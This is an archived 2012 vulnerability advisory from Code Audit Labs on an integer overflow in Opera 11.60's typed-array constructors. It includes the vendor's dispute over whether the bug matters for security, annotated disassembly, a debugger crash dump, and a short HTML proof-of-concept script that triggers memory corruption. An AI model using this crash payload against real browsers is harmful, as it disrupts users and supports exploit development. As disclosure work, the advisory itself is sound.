OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
[CAL-2012-0004] opera array integer overflow

From: Code Audit Labs (vulnhuntgmail.com)
Date: Wed Feb 01 2012 - 20:36:41 CST


CAL-2012-0004 opera array integer overflow

1 Affected Products
=================
11.60 and prior

2 Vulnerability Details
=====================

Code Audit Labs http://www.vulnhunt.com has discovered a integer
overflow vulnerability in array functions like
Int32Array,Int16Array... .

Opear vendor say "We have reproduced the problem, and determined that it
does not have any security implications, since the crash is a caused by
a memory fill operation which the webpage have no control over, and this
operation will always crash. It is therefore classified as a stability
issue, not a security issue. "

we still insist on that it is a security issue or not should accord to
root cause of this bug instead of is it exploitable or not. because you
think it is unexploitable, someone can exploit it via deeply research.

So if most people of Security Community think this is a security issue,
please assign to a CVE number.

3 Analysis
=========
Int16Array(2147483647) example
memory corrupt happen if satisfy with following Conditions
1: x*2 >2
2:x*2!=00
3: (x*2-1)+0x1f overflow 32bits.

so the length of malloc is (x*2-1)+0x1f
memset(eax+0x10,0,x*2) cause memory corrupt

text:5C769F57
.text:5C769F57 loc_5C769F57: ; CODE XREF:
sub_5C769DCE+17Cj
.text:5C769F57 mov eax, [esp+48h+var_20] ; var_20 is 2
.text:5C769F5B imul eax, [esp+48h+var_3C] ; var_3C is
80000001
.text:5C769F60 cmp eax, [esp+48h+var_3C]
.text:5C769F64 jb short loc_5C769F37
.text:5C769F66 mov [esp+48h+size], eax
.text:5C769F6A mov eax, [ebp+arg_0]
.text:5C769F6D call sub_5C14A6E8
.text:5C769F72 push [esp+48h+size] ; size
.text:5C769F76 push dword ptr [eax] ; int
.text:5C769F78 push [ebp+arg_0] ; int
.text:5C769F7B call sub_5C765B6D
.text:5C769F80 add esp, 0Ch

...

.text:5C46A598
.text:5C46A598 arg_0 = dword ptr 4
.text:5C46A598 size = dword ptr 8
.text:5C46A598
.text:5C46A598 mov edx, [esp+arg_0]
.text:5C46A59C push esi
.text:5C46A59D mov esi, [esp+4+size]
.text:5C46A5A1 test esi, esi
.text:5C46A5A3 jz short loc_5C46A5AA
.text:5C46A5A5 lea eax, [esi-1]
.text:5C46A5A8 jmp short loc_5C46A5AC
.text:5C46A5AA ;
---------------------------------------------------------------------------
.text:5C46A5AA
.text:5C46A5AA loc_5C46A5AA: ; CODE XREF:
sub_5C46A598+Bj
.text:5C46A5AA xor eax, eax
.text:5C46A5AC
.text:5C46A5AC loc_5C46A5AC: ; CODE XREF:
sub_5C46A598+10j
.text:5C46A5AC mov ecx, [edx+8]
.text:5C46A5AF add eax, 1Fh
.text:5C46A5B2 push 0
.text:5C46A5B4 and eax, 0FFFFFFF8h
.text:5C46A5B7 push eax
.text:5C46A5B8 push edx
.text:5C46A5B9 call sub_5C019DA0

ext:5C765BF7 loc_5C765BF7: ; CODE XREF:
sub_5C765B6D+50j
.text:5C765BF7 push [ebp+size] ; size
.text:5C765BFA lea eax, [ebx+10h]
.text:5C765BFD push 0 ; c
.text:5C765BFF push eax ; dst
.text:5C765C00 call memset

4 Exploitable?
============
who known?

5 Crash info:
===============
(d10.ff4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8
edi=03610e68
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0 nv up ei pl nz na
pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010207
*** ERROR: Symbol file could not be found. Defaulted to export symbols
for C:\Program Files\Opera\Opera.dll -
Opera!OpGetNextUninstallFile+0x1961c:
675b347e 660f7f4150 movdqa xmmword ptr [ecx+50h],xmm0
ds:0023:03680000=????????????????????????????????
0:000> .exr -1
ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c)
    ExceptionCode: c0000005 (Access violation)
   ExceptionFlags: 00000000
NumberParameters: 2
    Parameter[0]: 00000001
    Parameter[1]: 03680000
Attempt to write to address 03680000
0:000> kp
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be
wrong.
02314e24 00000000 Opera!OpGetNextUninstallFile+0x1961c

6 POC:
====
open a html with following content

<script>
//这些全是crash
Int32Array(1073741823)
Float32Array(1073741823)
Float64Array(1073741823)
Int32Array(1073741823)
Uint32Array(1073741823)
Int16Array(2147483647)
ArrayBuffer(4294967295)
</script>

7 About Code Audit Labs:
=====================
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com